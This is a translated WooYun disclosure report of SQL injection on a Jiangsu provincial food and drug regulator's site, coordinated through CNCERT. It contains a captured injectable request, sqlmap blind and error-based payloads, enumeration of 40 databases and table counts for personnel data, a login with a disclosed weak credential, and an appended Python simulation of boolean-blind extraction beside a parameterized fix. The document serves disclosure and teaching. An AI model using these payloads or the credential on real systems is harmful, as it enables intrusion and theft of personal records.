
Vulnerability summary

Defect ID: wooyun-2016-0166474

Title: SQL injection on a site of the 江苏省食品药品监督管理局 (Jiangsu Provincial Food and Drug Administration), exposing 40 databases and 50,000 personnel records (phone numbers, ID card numbers, names, education, positions, etc.)

Related vendor: 江苏省食品药品监督管理局 (Jiangsu Provincial Food and Drug Administration)

Author: 逆流冰河

Submitted: 2016-01-02 00:18

Fixed: 2016-02-20 15:48

Published: 2016-02-20 15:48

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-02: details sent to the vendor; awaiting vendor handling
2016-01-08: vendor confirmed; details disclosed to the vendor only
2016-01-18: details disclosed to core white hats and domain experts
2016-01-28: details disclosed to regular white hats
2016-02-07: details disclosed to intern white hats
2016-02-20: details disclosed to the public

Brief description:

Government

Detailed description:

1. Injection point:

POST http://**.**.**.**/dwr/call/plaincall/UserValidate.isNameExist.dwr HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Content-Length: 237
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Content-Type: text/plain
Accept: */*
Referer: http://**.**.**.**/register.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=4455EDD1EA17939E7A0283CA97CCD903; _gscu_1901782482=51394714g66yq468; _gscs_1901782482=51394714n8fz2168|pv:64; _gscbrs_1901782482=1
callCount=1
windowName=
c0-scriptName=UserValidate
c0-methodName=isNameExist
c0-id=0
c0-param0=string:abcd123*
batchId=3
page=%2Fregister.jsp
httpSessionId=4455EDD1EA17939E7A0283CA97CCD903
scriptSessionId=D107918E0BAA78BCEC0FC9876CF1A8BA


c0-param0=string:abcd123* is injectable (the trailing * is sqlmap's marker for the injection position inside a custom POST body).
2. This is probably the main database server; every database on it was enumerated:
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: callCount=1
windowName=
c0-scriptName=UserValidate
c0-methodName=isNameExist
c0-id=0
c0-param0=string:abcd123' AND 9159=9159 AND 'TrQo'='TrQo
batchId=3
page=/register.jsp
httpSessionId=4455EDD1EA17939E7A0283CA97CCD903
scriptSessionId=D107918E0BAA78BCEC0FC9876CF1A8BA
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: callCount=1
windowName=
c0-scriptName=UserValidate
c0-methodName=isNameExist
c0-id=0
c0-param0=string:abcd123' AND 4902=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (4902=4902) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(107)||CHR(107)||CHR(113)||CHR(62))) FROM DUAL) AND 'jIgC'='jIgC
batchId=3
page=/register.jsp
httpSessionId=4455EDD1EA17939E7A0283CA97CCD903
scriptSessionId=D107918E0BAA78BCEC0FC9876CF1A8BA
---
back-end DBMS: Oracle
available databases [40]:
[*] AJYW
[*] APEX_030200
[*] APPQOSSYS
[*] CHARISMA
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FDA_PUB
[*] FLOWS_FILES
[*] HR
[*] HZP
[*] IX
[*] JSSPCJ
[*] JSYPCJ
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] QLYG
[*] QXJY_CLIENT
[*] QXXK
[*] QYYW
[*] SCOTT
[*] SH
[*] SXYPCJ
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TYMK
[*] WMSYS
[*] WORKFLOW
[*] WORKFLOW_INST
[*] XDB
[*] YPCJ
[*] YPJY_CLIENT
[*] ZWDT
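The following is an added example and is not code from the original report or from the affected site. It simulates the injection point from step 1 and the boolean-based blind technique sqlmap reported in step 2: an in-memory SQLite table stands in for the Oracle PUB_USER table (the real schema and the server-side Java were never published, so the lookup query is an assumed shape), the DWR plaincall body is built field for field as in the captured request, and a true/false oracle is driven through c0-param0 against both a string-concatenated lookup and a parameterized one. The DWR reply format, the sample rows, and the helper names are all the example's own assumptions.

```python
"""Added example (not from the WooYun report or the affected site): simulate
the injectable DWR call UserValidate.isNameExist with an SQLite stand-in for
the Oracle backend, build the DWR plaincall body, and run a boolean-blind
oracle against a concatenated lookup and a parameterized one.
"""
import re
import sqlite3
import urllib.parse

# Constructed sample rows standing in for PUB_USER (values are made up).
SAMPLE_USERS = ["admin", "lsht", "zhang3"]
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789_"


def make_db(users=SAMPLE_USERS):
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE PUB_USER (USERNAME TEXT)")
    conn.executemany("INSERT INTO PUB_USER VALUES (?)", [(u,) for u in users])
    return conn


def is_name_exist_vulnerable(conn, name):
    """Assumed shape of the lookup: the parameter is concatenated into the WHERE clause."""
    sql = "SELECT COUNT(*) FROM PUB_USER WHERE USERNAME = '" + name + "'"
    return conn.execute(sql).fetchone()[0] > 0


def is_name_exist_fixed(conn, name):
    """Same lookup with a bound parameter: the value is never parsed as SQL."""
    sql = "SELECT COUNT(*) FROM PUB_USER WHERE USERNAME = ?"
    return conn.execute(sql, (name,)).fetchone()[0] > 0


def dwr_plaincall_body(script, method, param, batch_id=3, page="/register.jsp",
                       http_session_id="", script_session_id=""):
    """text/plain body of a DWR plaincall, laid out as in the captured request;
    string parameters are percent-encoded as the DWR client does."""
    lines = [
        "callCount=1",
        "windowName=",
        "c0-scriptName=" + script,
        "c0-methodName=" + method,
        "c0-id=0",
        "c0-param0=string:" + urllib.parse.quote(param, safe=""),
        "batchId=" + str(batch_id),
        "page=" + urllib.parse.quote(page, safe=""),
        "httpSessionId=" + http_session_id,
        "scriptSessionId=" + script_session_id,
    ]
    return "\n".join(lines)


def fake_dwr_server(conn, body, handler):
    """Constructed stand-in for the .dwr endpoint: parse the body, call the
    lookup, reply in DWR 2.x script format (approximated, not captured)."""
    fields = dict(line.split("=", 1) for line in body.splitlines())
    name = urllib.parse.unquote(fields["c0-param0"][len("string:"):])
    result = handler(conn, name)
    return ("//#DWR-INSERT\n//#DWR-REPLY\n"
            "dwr.engine._remoteHandleCallback('%s','%s',%s);"
            % (fields["batchId"], fields["c0-id"], "true" if result else "false"))


def blind_oracle(conn, handler, condition):
    """Boolean-blind oracle through c0-param0. sqlmap chained its condition
    with AND after abcd123'; here a non-existent base name would make that
    always false, so the condition is chained with OR, keeping sqlmap's
    'TrQo'='TrQo tail to balance the closing quote."""
    payload = "' OR (%s) AND 'TrQo'='TrQo" % condition
    body = dwr_plaincall_body("UserValidate", "isNameExist", payload)
    reply = fake_dwr_server(conn, body, handler)
    m = re.search(r"_remoteHandleCallback\('\d+','\d+',(true|false)\)", reply)
    return m is not None and m.group(1) == "true"


def extract_min_username(conn, handler, max_len=32):
    """Recover MIN(USERNAME) one character at a time from true/false answers
    (LENGTH and SUBSTR behave alike in Oracle and SQLite). None if the oracle
    never answers true, i.e. the lookup is not injectable."""
    subq = "(SELECT MIN(USERNAME) FROM PUB_USER)"
    length = None
    for n in range(1, max_len + 1):
        if blind_oracle(conn, handler, "LENGTH(%s)=%d" % (subq, n)):
            length = n
            break
    if length is None:
        return None
    out = ""
    for i in range(1, length + 1):
        for ch in ALPHABET:
            if blind_oracle(conn, handler, "SUBSTR(%s,%d,1)='%s'" % (subq, i, ch)):
                out += ch
                break
        else:
            out += "?"
    return out


if __name__ == "__main__":
    db = make_db()
    print("concatenated lookup leaks:", extract_min_username(db, is_name_exist_vulnerable))
    print("parameterized lookup leaks:", extract_min_username(db, is_name_exist_fixed))
```

The quick manual check the report implies is `blind_oracle(db, handler, "1=1")` against `"1=2"`: with the concatenated lookup the two calls return different callback values, with the bound parameter both return false because the whole payload is compared as a literal username. The character-by-character loop is deliberately slow (one request per candidate character); sqlmap's binary search over ASCII() is the production version of the same idea.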
3. User information. This is only one database; the other databases hold plenty of data as well, and the user table contains a great deal: phone numbers, ID card numbers, education, and so on.
Database: FDA_PUB
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| PUB_UCBUSI | 55901 |
| PUB_USERCORP | 45223 |
| PUB_CORP | 42269 |
| PUB_USER | 40435 | user table
| PUB_UCBRESULT | 27452 |
| TS_RYJL | 19980 |
| TB_RYJB | 18286 |
| TRA_REVOCATION | 1066 |
| TB_CP | 616 |
| TRA_ATTACHMENT_CONTENT | 194 |
| TRA_CORPAPPLICATION | 194 |
| PUB_DIC_YWLX | 127 |
| PUB_DIC_QLZXT | 52 |
| TB_SQRJBB | 52 |
| PUB_DIC_QL | 48 |
| TS_YWZD | 29 |
| PUB_BUSI | 27 |
| TB_RYJB1 | 13 |
| TS_RYJL1 | 13 |
| TS_ZDLX | 2 |
+------------------------+---------+
4. Database: SH
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| SALES | 918843 |
| COSTS | 82112 |
| CUSTOMERS | 55500 |
| FWEEK_PSCAT_SALES_MV | 11266 |
| SUPPLEMENTARY_DEMOGRAPHICS | 4500 |
| TIMES | 1826 |
| PROMOTIONS | 503 |
| PRODUCTS | 72 |
| CAL_MONTH_SALES_MV | 48 |
| COUNTRIES | 23 |
| DR$SUP_TEXT_IDX$R | 22 |
| CHANNELS | 5 |
+----------------------------+---------+
Database: TYMK
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| QLWSTMYX_FJ | 38600 |
| QLWSTMYX_FJNR | 36989 |
| QLWSTMYX_YWZB | 28857 |
| QLWSTMYX_ZYYSZC | 22531 |
| QLWSTMYX_DQZYYSXX | 11870 |
| YPSCXK_BAYPZCZ | 7739 |
| YPSCXK_DQYPZCZ | 7626 |
| QLWSTMYX_QSCL | 4095 |
| YPSCXK_PEOLEINFO | 3216 |
| QLWSTMYX_SQRKB | 2082 |
| YPSCXK_DQQYSCDZFW | 1953 |
| YPSCXK_BAQYSCDZFW | 1900 |
| YPSCXK_BAQYSCJXPZ | 1765 |
| YPSCXK_DQQYSCJXPZ | 1745 |
| QLWSTMYX_ZYYSZC2 | 1346 |
| QLWSTMYX_ZYYSZC3 | 1346 |
| YPSCXK_BGXM | 1220 |
| YPSCXK_BGQYSCDZFW | 952 |
| QXC_QXSCZLTXKH | 845 |
| YPSCXK_BAGMPXX | 735 |
| YPSCXK_DQGMPXX | 710 |
| QLWSTMYX_FZXX | 688 |
| YPSCXK_BAQYJBXX | 566 |
| YPSCXK_DQQYJBXX | 548 |
| QLWSTMYX_YWZB2 | 545 |
| YPSCXK_BAYPSCXKZXX | 539 |
| YPSCXK_DQYPSCXKZXX | 536 |
| TT | 416 |
| YPWTJG_WTPZXX | 398 |
| YPSCXK_QYSCJXPZ | 224 |
| YPWTJG_DQWTXX | 207 |
| YPSCXK_BAQYSCJWGMP | 201 |
| YPSCXK_DQQYSCJWGMP | 199 |
| QLWSTMYX_DZ | 189 |
| YPSCXK_QYSCDZFW | 125 |
| ST_REGION | 120 |
| QLWSTMYX_FJLX | 113 |
| YPSCXK_QYJBXX | 113 |
| AA | 93 |
| QLWSTMYX_YWLX | 87 |
| YPWTJG_WTBL | 46 |
| QLWSTMYX_GSGG | 43 |
| QLWSTMYX_XCJCFA | 16 |
| QLWSTMYX_BYXKTZS | 1 |
| QLWSTMYX_CODE_SLH | 1 |
+--------------------+---------+
5. I won't go through every one of them.
6. Found a login page to take a look at:
http://**.**.**.**/sysmng.logout.do

[screenshot: 111111.jpg]


Logged in with lsht/123; this password is really dumb.

[screenshot: 444444.jpg]

Proof of vulnerability:

No damage was done; please don't come knocking.

Fix recommendation:

No damage was done; please don't come knocking.

Copyright notice: when reposting, please credit the source: 逆流冰河@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 10

Confirmed: 2016-01-08 16:09

Vendor reply:

CNVD confirmed the reported vulnerability and has passed it via CNCERT to its Jiangsu branch center, which will coordinate handling with the site's operating unit.

Latest status:

None